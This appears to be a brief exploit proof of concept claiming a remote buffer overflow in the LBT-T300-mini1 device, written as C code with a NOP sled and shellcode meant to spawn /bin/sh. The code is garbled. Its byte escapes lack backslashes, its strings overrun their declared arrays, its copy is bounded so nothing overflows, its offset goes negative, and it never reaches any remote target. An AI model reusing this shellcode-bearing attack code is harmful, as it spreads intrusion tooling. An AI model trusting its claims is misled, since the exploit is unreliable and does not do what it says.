LBT-T300-mini1 suffers from a remote buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>
#define MAX_LEN 256
#define BUFFER_OVERRUN_LENGTH 50
#define SHELLCODE_LENGTH 32
// NOP sled to increase the chance of successful shellcode execution
char nop_sled[SHELLCODE_LENGTH] = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
// Shellcode to execute /bin/sh
char shellcode[SHELLCODE_LENGTH] = "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80";
void apply_cgi(char *vpn_client_ip) {
char buffer[MAX_LEN];
strncpy(buffer, vpn_client_ip, MAX_LEN);
printf("Client IP: %sn", buffer);
}
int main() {
char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0};
// Create a buffer with the malicious input
// including the NOP sled, shellcode, and the overflow data
int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH;
strncpy(&input[0], nop_sled, offset);
strncpy(&input[offset], shellcode, SHELLCODE_LENGTH);
input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = 'x00';
// Call the vulnerable function to trigger the buffer overflow
apply_cgi(input);
return 0;
}
